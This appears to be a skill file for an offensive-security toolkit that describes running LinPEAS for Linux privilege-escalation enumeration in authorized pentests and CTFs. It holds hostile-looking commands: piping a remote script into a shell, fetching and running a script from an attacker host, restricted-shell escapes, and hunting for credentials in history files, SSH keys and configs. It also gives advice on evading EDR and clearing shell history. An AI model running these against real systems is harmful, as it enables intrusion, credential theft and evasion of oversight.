| name | privesc-linpeas |
| description | Linux privilege escalation enumeration and attack surface analysis using LinPEAS (Linux Privilege Escalation Awesome Script). Automates post-exploitation discovery of escalation vectors, misconfigurations, and credential exposure on Linux targets. Use when: (1) Enumerating privilege escalation vectors after initial access on a Linux system, (2) Identifying SUID/SGID binaries, sudo misconfigurations, and capability abuses, (3) Hunting for credentials in config files, history, and logs, (4) Detecting container breakout opportunities and writable service files, (5) Mapping kernel exploits and CVE exposure for a target system, (6) Conducting authorized CTF, red team, or penetration test post-exploitation phases.
|
| version | 0.1.0 |
| maintainer | SirAppSec |
| category | offsec |
| tags | ["privesc","linpeas","post-exploitation","linux","enumeration","red-team","privilege-escalation"] |
| frameworks | ["MITRE-ATT&CK","PTES"] |
| dependencies | {"tools":["curl","bash","python3"],"optional":["wget"]} |
| references | ["https://github.com/peass-ng/PEASS-ng/tree/master/linPEAS","https://book.hacktricks.xyz/linux-hardening/privilege-escalation","https://attack.mitre.org/tactics/TA0004/","https://attack.mitre.org/tactics/TA0007/"] |
LinPEAS Linux Privilege Escalation
Overview
LinPEAS (Linux Privilege Escalation Awesome Script) is the most comprehensive automated enumeration tool for identifying privilege escalation vectors on Linux systems. It checks 200+ attack vectors, color-codes findings by severity, and maps results to GTFOBins and MITRE ATT&CK.
IMPORTANT: Use only on systems where you have explicit written authorization. Unauthorized use constitutes computer fraud. All actions should be conducted within defined engagement scope.
Quick Start
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh -o /tmp/linpeas.sh
chmod +x /tmp/linpeas.sh
/tmp/linpeas.sh -a 2>&1 | tee /tmp/linpeas_output.txt
/tmp/linpeas.sh -s 2>&1 | tee /tmp/linpeas_fast.txt
Script variants (choose based on environment):
linpeas.sh — default, includes linux exploit suggester
linpeas_fat.sh — embeds third-party tools (no internet needed on target)
linpeas_small.sh — essential checks only, smallest footprint
Use scripts/linpeas_runner.py for structured JSON output and automated triage.
Core Workflow
Post-Exploitation Enumeration Workflow
Progress:
[ ] 1. Verify authorization and document scope
[ ] 2. Transfer or fetch LinPEAS to target (curl, wget, or scp)
[ ] 3. Execute scan: ./linpeas.sh -a 2>&1 | tee linpeas_output.txt
[ ] 4. Triage findings by severity (RED = critical, YELLOW = medium)
[ ] 5. Validate top vectors manually before exploitation
[ ] 6. Attempt privilege escalation using highest-confidence vector
[ ] 7. Verify privilege level: id && whoami
[ ] 8. Document exploitation path and clean up artifacts
Severity Color Guide
| Color | Meaning |
|---|
| RED+ | 95% escalation probability (exploit immediately) |
| RED | High confidence vector (validate then exploit) |
| YELLOW | Interesting finding (requires manual review) |
| GREEN | Low-risk information |
Targeted Scans (Faster Execution)
find / -perm -4000 -o -perm -2000 2>/dev/null | xargs ls -la
sudo -l
ps aux && systemctl list-units --type=service --state=running
/usr/sbin/getcap -r / 2>/dev/null
echo $PATH | tr ':' '\n' | xargs -I{} find {} -writable -type f 2>/dev/null
cat /etc/crontab; ls -la /etc/cron.*; crontab -l 2>/dev/null
ss -tulpn; netstat -tulpn 2>/dev/null
Key Attack Vectors
See references/privesc_vectors.md for detailed exploitation steps per vector.
Tier 1: High-Confidence Escalation Paths
Sudo Misconfigurations
sudo -l
SUID Binaries
find / -perm -u=s -type f 2>/dev/null
Writable /etc/passwd or /etc/shadow
ls -la /etc/passwd /etc/shadow
Kernel Exploits
uname -r && cat /etc/os-release
Tier 2: Credential Hunting
cat ~/.bash_history; find / -name ".bash_history" 2>/dev/null | xargs cat
grep -r "password\|passwd\|secret\|token" /etc /opt /var/www 2>/dev/null --include="*.conf" --include="*.cfg" --include="*.ini"
find / -name "id_rsa" -o -name "id_ecdsa" 2>/dev/null
Tier 3: Container / Environment Breakout
cat /proc/1/cgroup | grep -i docker
ls /.dockerenv 2>/dev/null
env | grep -i kube
cat /proc/self/status | grep CapEff
See references/mitre_mapping.md for MITRE ATT&CK technique mappings.
Security Considerations
- Authorization: Obtain explicit written authorization before running. Document engagement scope.
- Sensitive Data: LinPEAS output contains credentials, hashes, and keys — treat as highly sensitive. Encrypt at rest, delete after engagement.
- Audit Logging: Log all commands executed with timestamps in engagement notes. Some blue teams monitor for LinPEAS signatures.
- OPSEC: In red team engagements, consider evasion — see references for obfuscation techniques. Run from tmpfs (
/dev/shm) to avoid disk artifacts.
- Cleanup: Remove LinPEAS binary and output files after the engagement. Clear relevant shell history entries.
- Compliance: Activities must comply with engagement rules of engagement, SOW, and applicable laws (CFAA, Computer Misuse Act, etc.).
Bundled Resources
Scripts (scripts/)
linpeas_runner.py — Automates LinPEAS fetch, execution, output parsing, and JSON report generation with severity triage
References (references/)
privesc_vectors.md — Detailed exploitation steps for common Linux privesc vectors (SUID, sudo, crons, capabilities, NFS, LD_PRELOAD, PATH hijacking)
mitre_mapping.md — MITRE ATT&CK technique mappings for each enumerated vector
Assets (assets/)
linpeas_report_template.md — Engagement report template for documenting privilege escalation findings
Integration Points
- Post-Metasploit: Run after initial Meterpreter shell via
shell command or post/multi/manage/shell_to_meterpreter
- Post-Nmap: Use after
recon-nmap identifies live Linux targets
- CI/CD Security Testing: Integrate into automated purple team pipelines to validate privilege escalation mitigations
- Reporting: Feed
linpeas_runner.py JSON output into CVSS scoring and risk documentation
Troubleshooting
Issue: AV or EDR blocks LinPEAS execution
Solution: Use the Python/PSPY alternative or compile a custom version.
curl -sL <url> | bash
./pspy64
Issue: Restricted shell (rbash, no /bin/bash)
Solution: Escape restricted shell before running enumeration.
python3 -c 'import pty; pty.spawn("/bin/bash")'
vi -c ':!/bin/bash'
awk 'BEGIN {system("/bin/bash")}'
Issue: No internet access on target
Solution: Transfer LinPEAS via the attacker machine.
python3 -m http.server 8080
wget http://<attacker-ip>:8080/linpeas.sh -O /tmp/lp.sh && chmod +x /tmp/lp.sh && /tmp/lp.sh
References